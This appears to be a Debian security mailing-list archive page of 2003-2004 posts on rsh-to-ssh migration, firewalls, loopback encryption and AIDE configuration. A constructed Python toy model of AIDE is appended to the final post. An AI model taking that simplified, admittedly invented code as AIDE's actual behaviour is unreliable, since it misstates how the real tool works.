Hello,

The company I just started working for has grown out of the 80s and uses
networking extensively in all of its services. We currently use rsh and
rcp EXTENSIVELY to move between 40-60 computers through a frame, and our
customers are getting more and more interested in hearing what our
security policy is... problem is, we don't have one. Ever since arriving
I've been trying to convince my supervisor that rsh should be given the
boot, but he and others are VERY concerned about the amount of effort it
would take to make the transition.

So I'm looking for hints and tips about migrating from rsh to ssh.
Comments? Suggestions? All are appreciated!

-Peter


signature.asc
Description: This is a digitally signed message part




unsubscribe

2004-03-01 Thread Peter Jensen



 




Re: Dsniff/mailsnarf

2004-02-25 Thread DI Peter Burgstaller

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 For all of us non native speakers of english and living outside the 
USA, here's some info on the acronyms to follow the thread:


http://www.safetyfile.com/page/S/CTGY/HIPPA

http://www.gaarde.org/acronyms/?lookup=cya


Thanks Jose for that .. :)

And .. btw. if I ever were to send such information out .. I certainly 
would make sure that
NO ONE could read that info plain text (method here>)


- - Just my 2c
- - Cheers, Peter
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.3 (Darwin)

iEYEARECAAYFAkA8YTcACgkQezyUhHKdNXTFugCdGGrCTeug+QA5zmrY6HaT49sa
BHkAn1hhN/8b5DExgSAXFpA07k8U6vZZ
=h0iC
-END PGP SIGNATURE-





Re: Mail Delivery System

2004-02-10 Thread peter
This is an autoresponder. I'll never see your message.






Re: Firewall: Need Advice

2004-02-07 Thread Peter Gossner
On 07 Feb 2004 10:38:51 +0200  E&Erdem <[EMAIL PROTECTED]> wrote:
>Hi,
>I've been using iptables (or i assuming that). But at boot time it
>gives an error: "Aborting iptables load: unknown rulesets "active" ". I
>couldn't find the problem. I searched via google, and found
>dpkg-reconfigure iptables. But it didn't help. I read a lot of iptables
>documents. But i think i lost some points, because i don't understand
>something. 
>
>Before this i want to ask that, do i need firewall? Yes, i know this is
>very important tool for whose, who taking care about security. And i
>can say i'm a paranoid about security. But all of my ports closed.
>There isn't any service listen. But sometimes i need httpd and ssh.
>
>This machine shares internet connection with a small network. So i have
>to be careful about this. 
All the more reason for a firewall.
The firewall should be on the machine that actually connects to the net.
Try using something like firestarter to get started with.

 firestarter is a GNOME program that will help you in configuring and
 monitoring a GNU/Linux firewall using either ipchains or iptables.
The latest version of Firestarter can always be found at



Essentially it writes scripts for you and starts itself up when needed.

Pete

>
>Thanks now...
>
>P.S: Sorry, my English is not enough (especially technical) for telling
>my problem in a clear way. I hope you can understand.  
>
>-- 
>__
> E&Erdem
>-- 
>   
>
>
>-- 
>To UNSUBSCRIBE, email to [EMAIL PROTECTED]
>with a subject of "unsubscribe". Trouble? Contact
>[EMAIL PROTECTED]






Re: Web based password changer

2004-01-27 Thread Peter Cordes
On Fri, Jan 23, 2004 at 04:13:35PM +1100, Michael Sharman wrote:
> how about:
> 
> echo $user:$newpasswd | chpasswd
> 

 Better check if chpasswd actually works.  The comments in the postinst for
sash indicate it doesn't use PAM, and you have to do your own MD5 crypting.
If that's correct, you can't just use chpasswd.

-- 
#define X(x,y) x##y
Peter Cordes ;  e-mail: X([EMAIL PROTECTED] , des.ca)

"The gods confound the man who first found out how to distinguish the hours!
 Confound him, too, who in this place set up a sundial, to cut and hack
 my day so wretchedly into small pieces!" -- Plautus, 200 BC






Re: Crypto-Swap questions

2004-01-21 Thread Peter Cordes
On Tue, Jan 20, 2004 at 10:53:10PM -0800, Johannes Graumann wrote:
> Is the encryptionloop significantly slower than
> diskwrite/read speed?

 No, but it uses CPU, and disk I/O doesn't (when using dma:  with IDE, use
hdparm -v /dev/hda  to check.  With SCSI, well, you bought it so you
wouldn't have to worry about crap like that. :)

-- 
#define X(x,y) x##y
Peter Cordes ;  e-mail: X([EMAIL PROTECTED] , des.ca)

"The gods confound the man who first found out how to distinguish the hours!
 Confound him, too, who in this place set up a sundial, to cut and hack
 my day so wretchedly into small pieces!" -- Plautus, 200 BC


signature.asc
Description: Digital signature


Re: 2.6.1 CryptoAPI woes

2004-01-21 Thread Peter Cordes
On Tue, Jan 20, 2004 at 11:07:51PM -0800, Johannes Graumann wrote:
> I feel this is kind of over my head ... to boil it down: does it even
> make sense to run reiserfs inside a loopback partition?

 Yes, if the file you're looping back to is on a journalled filesystem, or
is a partition.

 (ext3 is fine, but you need to patch reiserfs for ordered data.)

-- 
#define X(x,y) x##y
Peter Cordes ;  e-mail: X([EMAIL PROTECTED] , des.ca)

"The gods confound the man who first found out how to distinguish the hours!
 Confound him, too, who in this place set up a sundial, to cut and hack
 my day so wretchedly into small pieces!" -- Plautus, 200 BC


signature.asc
Description: Digital signature




Re: 2.6.1 CryptoAPI woes

2004-01-20 Thread Peter Cordes
On Tue, Jan 20, 2004 at 11:58:41PM -0500, Hubert Chan wrote:
> >>>>> "Johannes" == Johannes Graumann <[EMAIL PROTECTED]> writes:
> 
> [...]
> 
> Johannes> And on another note: in
> Johannes> 
> http://www.mirrors.wiretapped.net/security/cryptography/filesystems/loop-aes/loop-AES.README
> Johannes> I read the following: "Don't use a journaling file system on
> Johannes> top of file backed loop device, unless underlying file system
> Johannes> is journaled and guarantees data=ordered or data=journal."
> Johannes> Can anybody comment on whether I can use reiserfs on top of my
> Johannes> loopback?
> 
> The comment has nothing to do with whether or not your encrypted
> filesystem is a journaling filesystem with or without data=ordered. 

 Actually, it does.

> It
> has to do with using a file-backed loop device (versus partition-backed
> loop device), where the file is sitting on a journaling filesystem.  If
> your loop device is a partition, or is file-based, but sits on top of a
> non-journaled filesystem

 Wait a second;  I think this one doesn't belong in the list of things that
will be correct.

> or a journaled filesystem with data=ordered or
> journaled, then you can use any filesystem without problems.  (Or, at
> least, you won't (shouldn't) run into any problems other than what you
> might run into if it were not on a loopback device.)
> 
> Basically, if you don't have data=ordered, or data=journaled, any system
> crash could completely screw up your entire loopback, rendering it
> completely unusable.  If you don't plan on having any system crashes or
> hard reboots, I think you can still run a loopback on top a
> non-data=ordered journaled filesystem fairly safely.

 No, the point is that journaling file systems depend on stuff being written
to disk in the order they want, so if something goes wrong at _any_ moment,
they can pick up the pieces.  ext3 with data=writeback, for example, only
bothers to strictly control the order of metadata.  A loopback to a file on
such a filesystem will not preserve write ordering, so a journaling
filesystem on top of it will be making false assumptions.  Filesystem
metadata (which needs to be ordered) is just data on the loopback device.
However, if the underlying filesystem preserves data ordering, it can
satisfy the requirements of the journaling filesystem that's on top of it.

 I'm not sure if you need data=journal on the underlying filesystem for
data=journal on the loopback filesystem to make sense, but I don't think so.

-- 
#define X(x,y) x##y
Peter Cordes ;  e-mail: X([EMAIL PROTECTED] , des.ca)

"The gods confound the man who first found out how to distinguish the hours!
 Confound him, too, who in this place set up a sundial, to cut and hack
 my day so wretchedly into small pieces!" -- Plautus, 200 BC


signature.asc
Description: Digital signature




Re: aide, apt-get and remote management...

2003-12-14 Thread DI Peter Burgstaller

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I would like to thank everybody for their great input.
It was very useful to see your responses.

I guess the recent rootings have made us all a little more careful.

Take care, Peter

- --
  Dipl.-Ing. Peter Burgstaller
  Technical Director
  @ all information network & services gmbh
  email: [EMAIL PROTECTED]
  phone: +43 662 452335
  fax  : +43 662 452335 90 

-BEGIN PGP SIGNATURE-

Version: GnuPG v1.2.3 (Darwin)

iEYEARECAAYFAj/cHbMACgkQezyUhHKdNXSmbACggFX9Lf8NKRYInDG7CDgMDT78
NTIAnAxIrmcGUyyjmYEDZo6DS2QuJRfo
=v37l
-END PGP SIGNATURE-



Re: aide, apt-get and remote management...

2003-12-11 Thread Peter Solodov
On 11 Dec 2003, Douglas F. Calvert wrote:
> When I do, the files are obviously different in the aide database and
> I'm wondering if anyone has come up with a way to deal with these
> differences.

Do you mean that the new signatures don't match the ones in the
database?  In that case you review the changes and, if you're satisfied
they are expected, just replace the old database with the new one.  You
need to keep the database up to date.  My AIDE reports are usually
pretty short unless something big happens, like new packages or a reboot.

    - Peter

-- 
Peter Solodov| Concordia University 
http://alcor.concordia.ca/~peter | Montreal, QC, Canada



Re: aide, apt-get and remote management...

2003-12-11 Thread Peter Solodov
On 11 Dec 2003, DI Peter Burgstaller wrote:
> Hi there,
>
> I'm trying to use aide now as well .. but with the default debian
> config .. it produces every day massive changes .. especially to the
> /var/log/* files due to logrotate.
>
> Any reasonable settings that account for that?

Modify AIDE's config to suit your needs.  Here's what works for me:

  # check user, group and permissions
  /var/log u+g+p
  # expect files to grow
  /var/log/.* >
  # permissions, user, group, number of links, and growing size for
  # syslog logs
  /var/log/syslog/.* p+u+g+n+S
  # don't check any of the following log directories
  =/var/log/(sysstat|setuid|apache|exim|ksymoops) R

And I don't use the Debian package; I've compiled AIDE myself.  The
config files I'm using probably have very little in common with what
Debian supplies.

- Peter

-- 
Peter Solodov    | Concordia University 
http://alcor.concordia.ca/~peter | Montreal, QC, Canada



Re: aide, apt-get and remote management...

2003-12-11 Thread DI Peter Burgstaller

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hi there,

I'm trying to use aide now as well .. but with the default debian
config .. it produces every day massive changes .. especially to the
/var/log/* files due to logrotate.


Any reasonable settings that account for that?

Any advice would be greatly appreciated.
- - - Cheers, Peter
- - --
  Dipl.-Ing. Peter Burgstaller
  Technical Director
  @ all information network & services gmbh
  email: [EMAIL PROTECTED]
  phone: +43 662 452335
  fax  : +43 662 452335 90
-BEGIN PGP SIGNATURE-

Version: GnuPG v1.2.3 (Darwin)

iEYEARECAAYFAj/YWCQACgkQezyUhHKdNXRreACeMK9Pt4LIxnKmd8I1GhtaHIT2
vQoAn0YJHamV0D4wJAu0ChFZ6RFijHNe
=6MVw
- -END PGP SIGNATURE-

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.3 (Darwin)

iEYEARECAAYFAj/YWJwACgkQezyUhHKdNXQNxgCbBbDuNdmzHxcKlJvmKL8kAnwK
D/QAn1sPOMTKi2WkPGblW1uJCci3BJF7
=u0sL
-END PGP SIGNATURE-



Re: aide, apt-get and remote management...

2003-12-10 Thread Peter Solodov
On 10 Dec 2003, Douglas F. Calvert wrote:
> With all the recent discussions about debsigs and file integrity I
> have been trying to figure out the best way to deal with apt-get
> upgrades on remote machines with aide running. Does anyone have a
> good system for the management of the aide database and system
> upgrades? Or just any good aide tips would be nice as well.

Here's how I do that.  I have a tightly secured, well-protected
machine.  It holds the file integrity databases.  Every night it runs AIDE
on a bunch of remote machines (the AIDE binary is uploaded, then
signatures are collected and the output is shipped back to the secure
machine).  AIDE reports are generated on the machine that initiated
the check.  Nothing on a remote machine indicates that signatures are
collected.

That's the file integrity part.  As for upgrades and updates, I never
install anything automatically, but I have a cron job which checks if
updates are available.  And if there are, I would log on to a machine
and install new packages myself.

    - Peter

-- 
Peter Solodov| Concordia University 
http://alcor.concordia.ca/~peter | Montreal, QC, Canada
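The two halves of the set-up Peter describes in this thread, the rule-driven check from his 2003-12-11 reply (the /var/log rules) and the split between a monitored host that only collects signatures and a secure host that keeps the baseline and produces the report from his reply above, as one added toy model. This is constructed example code, not AIDE's own code or Peter's configuration: a sha256 hash stands in for AIDE's checksum groups, rule matching is reduced to "prefix match, `=` means the path itself only, longest match wins", the `/etc/.* R` rule is a constructed addition so that a content change is exercised, and the sample tree is built in a temporary directory.

```python
"""Toy model of the AIDE set-up described in the two messages above.
Constructed example, not AIDE's own code: scan() is the half that runs on the
monitored host (collect per-file "signatures"), compare() the half that runs
on the secure host holding the baseline.  Rule letters follow the aide.conf
groups used in the config (p perms, u uid, g gid, n links, s size, S size may
only grow, '>' growing log); sha256 stands in for AIDE's checksum groups.
Matching is simplified: a rule matches as a prefix, a '=' rule only the path
itself, and the longest match wins."""
import hashlib
import json
import os
import re
import shutil
import stat
import tempfile

GROUPS = {
    ">": {"p", "u", "g", "n", "S"},            # growing log file
    "R": {"p", "n", "u", "g", "s", "sha256"},  # subset of AIDE's R group
}

def parse_rules(text):
    """'regex attrs' lines -> (compiled regex, exact_only, attrs to check)."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        pattern, attrs = line.rsplit(None, 1)
        checks = GROUPS.get(attrs) or set(attrs.split("+"))
        rules.append((re.compile(pattern.lstrip("=")),
                      pattern.startswith("="), checks))
    return rules

def rule_for(path, rules):
    """Longest matching rule wins, later rules win ties; None = unwatched."""
    best, best_len = None, -1
    for rx, exact_only, checks in rules:
        m = rx.fullmatch(path) if exact_only else rx.match(path)
        if m and m.end() >= best_len:
            best, best_len = checks, m.end()
    return best

def scan(root):
    """Monitored host: attributes below root, keyed as if root were '/'."""
    manifest = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            entry = {"p": stat.S_IMODE(st.st_mode), "u": st.st_uid,
                     "g": st.st_gid, "n": st.st_nlink, "s": st.st_size}
            if stat.S_ISREG(st.st_mode):
                with open(full, "rb") as f:
                    entry["sha256"] = hashlib.sha256(f.read()).hexdigest()
            key = "/" + os.path.relpath(full, root).replace(os.sep, "/")
            manifest[key] = entry
    return manifest

def compare(baseline, current, rules):
    """Secure host: report only differences the rules watch; 'S' flags a
    shrinking file, so a truncated log stands out while growth stays quiet."""
    report = []
    for path in sorted(set(baseline) | set(current)):
        checks = rule_for(path, rules)
        if not checks:
            continue
        if path not in baseline or path not in current:
            report.append((path, "added" if path in current else "removed"))
            continue
        old, new = baseline[path], current[path]
        for attr in sorted(checks):
            if attr == "S" and new["s"] < old["s"]:
                report.append((path, "S: size shrank"))
            elif attr != "S" and old.get(attr) != new.get(attr):
                report.append((path, attr))
    return report

# Three rules from the message plus a constructed /etc rule (content check).
RULES = parse_rules("""
/var/log u+g+p
/var/log/.* >
=/var/log/(sysstat|setuid|apache|exim|ksymoops) R
/etc/.* R
""")

def demo():
    """Throwaway tree (constructed data): baseline, a day's changes, report."""
    root = tempfile.mkdtemp()
    def put(rel, data, mode="w"):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, mode) as f:
            f.write(data)
    try:
        put("var/log/syslog", "boot\n")
        put("var/log/auth.log", "login ok\n")
        put("etc/passwd", "root:x:0:0\n")
        baseline = json.loads(json.dumps(scan(root)))  # shipped as plain data
        put("var/log/syslog", "cron ran\n", "a")       # growth: silent
        put("var/log/auth.log", "")                    # truncation: reported
        put("etc/passwd", "root:x:0:0\nmallory:x:0:0\n")  # content: reported
        return compare(baseline, json.loads(json.dumps(scan(root))), RULES)
    finally:
        shutil.rmtree(root)
```

The manifest that `scan()` returns is plain data, which is what makes the split Peter describes work: the monitored host never sees the baseline or the report, only the collector, and `compare()` on the secure host decides what counts as a change. The `>` rule is what keeps the daily logrotate churn out of the report while still flagging a log that got shorter, which is the one thing a growing log should never do on its own.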


